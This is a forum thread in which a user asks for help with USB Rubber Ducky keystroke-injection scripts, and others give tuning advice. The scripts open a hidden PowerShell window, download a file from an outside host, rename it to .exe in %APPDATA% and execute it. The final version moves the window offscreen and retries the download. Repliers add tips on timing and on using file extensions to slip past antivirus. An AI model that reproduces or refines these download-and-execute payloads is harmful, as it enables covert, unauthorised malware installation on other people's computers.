Rubber Ducky Use = Flash/Focus/License/Creation/Driver

[Source_Writer]

Hello

On my W7 Ultimate laptop I plan to use the RD like a classic HID. I keep the original SD card and the original duck firmware (duck.hex). I don't need that RD is recognized like a drive and I'll use this script = https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---powershell-wget---execute . Here is my question for my actual situation :

1) Is it necessary to flash my SD card (for fat32 or something else) ?

2) I would like to use this script below. Is there a way to keep the focus on the hidden powershell windows opened/keep it on the first plan (to let the time to write the code lines) ? :

DELAY 10000

GUI r

DELAY 100

STRING powershell -windowstyle hidden

ENTER

DELAY 1000

STRING $source = "site.com/file.old"; $destination = "%APPDATA%\file.exe"; Invoke-WebRequest $source -OutFile $destination;

ENTER

DELAY 5000

STRING start-process file.exe

ENTER

DELAY 100

STRING exit

ENTER

3) I saw the RD license (for the driver) is a classic one, a better one will increase the price of RD I readed. So do you know where I could buy this kind of "better license" ? I would like this especially to not

have problems of compatibility and get a very fast driver installation for the first RD connection.

4) For a laptop (W7 Ultimate) is it better to use GUI R, WINDOWS R, CONTROL ESCAPE ?

5) To make my script, is it better to use ? :

/ Duck Toolkit 1 = http://ducktoolkit-411.rhcloud.com/Encoder.jsp

/ Duck Toolkit 2 = http://www.ducktoolkit.com

/ USB Rubber Ducky Tool = https://forums.hak5.org/index.php?/topic/36708-tool-usb-rubber-ducky-tool

/ Ducky Encoder = https://forums.hak5.org/index.php?/topic/32943-encoder-duckyencoder-gui-10-editor-with-syntax-highlighting

6) The driver installation for the first RD connection will ask something like 10 seconds, 30 seconds or more ?

7) For the powershell command is it better to use only .exe extension or .old/.apk ? What are the advantages ? The conversion old/apk => exe works everytime ?

8) The laptop where I'll plug the RD need Java installed or not ?

Thanks in advance.

SW

[White Light]

1. Don't change the format of the SD card. It should come standard as FAT32 (I believe) so leave it as that. 

2. There's no way to force powershell to stay active, as you've set the windowstyle to hidden. 

3. No idea about any special drivers. 

4. Stay with GUI r as you are already using. 

5. I use the encoder from the rubber ducky github. 

6. Depends on the destination computer. 30s is a very long time. For me it's generally done in under 10s. 

7. That just renames the file, it doesn't "convert" it. Using a different extension like .old may fool some AVs, but don't rely on that. 

8. No, it won't need Java when it is running as a keyboard. 

[Source_Writer]

Thanks for your answers.

6. Depends on the destination computer. 30s is a very long time. For me it's generally done in under 10s.

Ok. And the RD script starts after this first installation time I guess yes ? I don't need to set 15 sec delay so ?

7. That just renames the file, it doesn't "convert" it. Using a different extension like .old may fool some AVs, but don't rely on that.

Ok. It just rename the file so my code above is correct ? STRING $source = "site.com/file.old"; $destination = "%APPDATA%\file.exe"; Invoke-WebRequest $source -OutFile $destination;

I'm just scary now to keep the focus on the hidden powershell windows opened/keep it on the first plan.. I guess there is no solution.

[White Light]

On 5/18/2016 at 8:49 PM, Source_Writer said:

Thanks for your answers.

6. Depends on the destination computer. 30s is a very long time. For me it's generally done in under 10s.

Ok. And the RD script starts after this first installation time I guess yes ? I don't need to set 15 sec delay so ?.

No. The ducky starts to run as soon as it's plugged in, the only problem is that the computer won't respond to the keystrokes until after the driver has loaded. You will need a delay otherwise it'll start part way through.

 

On 5/18/2016 at 8:49 PM, Source_Writer said:

 

7. That just renames the file, it doesn't "convert" it. Using a different extension like .old may fool some AVs, but don't rely on that.

Ok. It just rename the file so my code above is correct ? STRING $source = "site.com/file.old"; $destination = "%APPDATA%\file.exe"; Invoke-WebRequest $source -OutFile $destination;

I'm just scary now to keep the focus on the hidden powershell windows opened/keep it on the first plan.. I guess there is no solution.

I'm not sure that the destination will function correctly. Variables in powershell are like $this and I don't think the web request will download the file to the correct location. You'll have to use $env:appdata instead.

[Broti]

Well since all questions hav e been answered so far, I'll just want to add my experiences to some of them

Question #5:
I usually use the GUI version of DuckyEncoder. But the other options are good aswell.

Question #6:
An initial DELAY 3000 should be sufficient for more or less modern systems - even for one of my old 800MHz Laptop (XP SP3).

 

[Source_Writer]

@White Light:

Thanks for the #6

About the #7 You think the powershell script (https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---powershell-wget---execute) can't work properly ?

@Broti:

Thanks for the #5 and #6. What do you think about the #7 ?

[Source_Writer]

I readed some article and arrived to that result (I didn't test it yet) :

DELAY 20000
GUI r
DELAY 300
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
STRING powershell -windowstyle hidden do{sleep 5;(New-Object Net.WebClient).DownloadFile('http://site.com/file.old','%APPDATA%\file.exe')}while(!$?);&'%APPDATA%\7z1601.exe'
ENTER

What do you think about that final code ?